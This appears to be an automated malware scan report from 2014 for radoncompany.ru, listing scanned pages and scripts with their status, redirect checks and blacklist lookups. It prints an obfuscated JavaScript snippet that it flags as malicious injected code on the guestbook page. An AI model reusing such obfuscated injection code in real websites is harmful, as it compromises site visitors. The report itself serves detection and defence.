Scanned pages/files
Request | Server response | Status |
http://radoncompany.ru/ | 200 OK Content-Length: 100485 Content-Type: text/html | clean |
http://rtrgt2.com/apu.php?zoneid=1708 | 200 OK Content-Length: 747 Content-Type: application/x-javascript | clean |
http://s51.ucoz.net/src/jquery-1.6.1.js | 200 OK Content-Length: 101532 Content-Type: text/javascript | clean |
http://s51.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 39848 Content-Type: text/javascript | clean |
http://s51.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228798 Content-Type: text/javascript | clean |
http://s51.ucoz.net/src/gstoolbar2/js/tool.js | 200 OK Content-Length: 35970 Content-Type: text/javascript | clean |
http://radoncompany.ru/designs_131/script_site.js | 200 OK Content-Length: 9589 Content-Type: application/javascript | clean |
http://radoncompany.ru/designs_131/highslide.js | 200 OK Content-Length: 51925 Content-Type: application/javascript | clean |
http://radoncompany.ru/load/ | 404 Not Found Content-Length: 1 Content-Type: text/html | clean |
http://radoncompany.ru/test404page.js | 404 Not Found Content-Length: 1 Content-Type: text/html | clean |
http://radoncompany.ru/gb/ | 200 OK Content-Length: 73002 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
var _y8M=''; function _dS(s){ var i;var r=""; var l=s.length-1; var k=s.substr(l,1); for (i=0;i<l;i++){ c=s.charCodeAt(i)-k; if(c<32){ c=127-(32-c);} r+=String.fromCharCode(c); } return r;} _y8M=_dS('Ansuzy%y~ujB\'mniijs\'%sfrjB\'xtx\'%{fqzjB\'788;><65<9\'%4C5');
Antivirus reports:
http://s7.ucoz.net/src/bbcodes.js | 200 OK Content-Length: 9800 Content-Type: text/javascript | clean |
http://radoncompany.ru/load/tureckie_serialy/ljubov_i_nenavist_aska_surgun_2005_tureckij_serial_na_russkom_jazyke/34-1-0-843 | 200 OK Content-Length: 82212 Content-Type: text/html | clean |
http://radoncompany.ru//vk.com/js/api/openapi.js?105/ | 404 Not Found Content-Length: 1 Content-Type: text/html | clean |
http://radoncompany.ru/load/tureckie_serialy/gospozha_dila_2012_tureckij_serial_vse_serij_na_russkom_jazyke/34-1-0-839 | 200 OK Content-Length: 82266 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: radoncompany.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Thu, 10 Apr 2014 01:12:05 GMT
Pragma: no-cache
Server: Apache
Content-Length: 100485
Content-Type: text/html;charset=utf-8
Expires: Sun, 13 Apr 2014 00:00:00 GMT
Last-Modified: Thu, 10 Apr 2014 00:00:00 GMT
X-Powered-By: PHP/5.4.23
...100485 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: radoncompany.ru
Referer: http://www.google.com/search?q=radoncompany.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=radoncompany.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://radoncompany.ru/
Result: radoncompany.ru is not infected or malware details are not published yet.